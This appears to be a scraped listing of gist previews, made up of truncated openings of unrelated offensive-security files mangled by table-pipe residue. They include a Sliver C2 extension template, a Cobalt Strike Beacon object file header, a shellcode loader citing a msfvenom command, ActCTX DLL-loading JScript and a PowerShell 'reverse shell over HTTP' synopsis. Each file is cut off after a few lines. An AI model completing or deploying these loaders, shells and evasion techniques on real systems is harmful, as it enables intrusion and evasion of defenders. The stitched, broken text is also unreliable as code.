{ | |
"SliverExtension" :{ | |
"prefix": "sliverext", | |
"body": [ "{", | |
"\"name\": \"$1\",", | |
"\"version\": \"0.0.0\",", | |
"\"command_name\": \"$2\",", | |
"\"extension_author\": \"$3\",", | |
"\"original_author\": \"$3\",", | |
"\"repo_url\": \"N/A\",", |
#define _WIN32_WINNT 0x0502 | |
#define WINVER 0x0502 | |
#include <windows.h> | |
#include <errhandlingapi.h> | |
#include <process.h> | |
#include "beacon.h" | |
WINBASEAPI PVOID WINAPI KERNEL32$AddVectoredExceptionHandler (ULONG First, PVECTORED_EXCEPTION_HANDLER Handler); | |
DECLSPEC_IMPORT uintptr_t __cdecl MSVCRT$_beginthreadex(void *_Security,unsigned _StackSize,_beginthreadex_proc_type _StartAddress,void *_ArgList,unsigned _InitFlag,unsigned *_ThrdAddr); | |
DECLSPEC_IMPORT void __cdecl MSVCRT$_endthreadex(unsigned _Retval); |
using System; | |
using System.Collections.Generic; | |
using System.Diagnostics; | |
using System.Linq; | |
using System.Runtime.InteropServices; | |
using System.Text; | |
using System.Threading.Tasks; | |
namespace HiddenEventLogs | |
{ |
#!/usr/bin/python | |
import requests | |
import json | |
import time | |
import paramiko | |
from Crypto.PublicKey import RSA | |
from os import chmod | |
public_key_name = "test1.key" |
#include <windows.h> | |
#include <sys/types.h> | |
#include <unistd.h> | |
int main(int argc, char **argv){ | |
//msfvenom -p windows/exec cmd=calc.exe EXITFUNC=thread -f c -v shellcode |
################################################################################# | |
# # | |
# Refer to this blog post about what this code is used for: # | |
# https://albocoder.github.io/malware/2021/06/01/SandboxStudy.html # | |
# # | |
################################################################################# | |
import requests | |
import os | |
import psutil |
using System; | |
using System.ComponentModel; | |
using System.Runtime.InteropServices; | |
namespace ComWithoutRegisteringExample | |
{ | |
internal static class ComHelper | |
{ | |
private delegate int DllGetClassObject(ref Guid clsid, ref Guid iid, [Out, MarshalAs(UnmanagedType.Interface)] out IClassFactory classFactory); |
//Example Reference: | |
// https://unit42.paloaltonetworks.com/unit42-houdinis-magic-reappearance/ | |
// Test | |
new ActiveXObject('WScript.Shell').Environment('Process')('TMP') = 'C:\\Tools'; | |
// Change that C:\\Tools to a location you specify, or dynamically find current directory. | |
// ActCTX will search for the DLL in TMP | |
var manifest = '<?xml version="1.0" encoding="UTF-16" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <assemblyIdentity type="win32" name="DynamicWrapperX" version="2.2.0.0"/> <file name="dynwrapx.dll"> <comClass description="DynamicWrapperX Class" clsid="{89565276-A714-4a43-912E-978B935EDCCC}" threadingModel="Both" progid="DynamicWrapperX"/> </file> </assembly>'; |
<# | |
.SYNOPSIS | |
Simple Reverse Shell over HTTP. Deliver the link to the target and wait for connectback. | |
Read And Write Files Over WebDAV Proof Of Concept | |
.PARAMETER Server | |
Listening Server IP Address |
sing System; | |
using System.Diagnostics; | |
using System.Reflection; | |
using System.Configuration.Install; | |
using System.Runtime.InteropServices; | |
/* | |
Author: Casey Smith, Twitter: @subTee |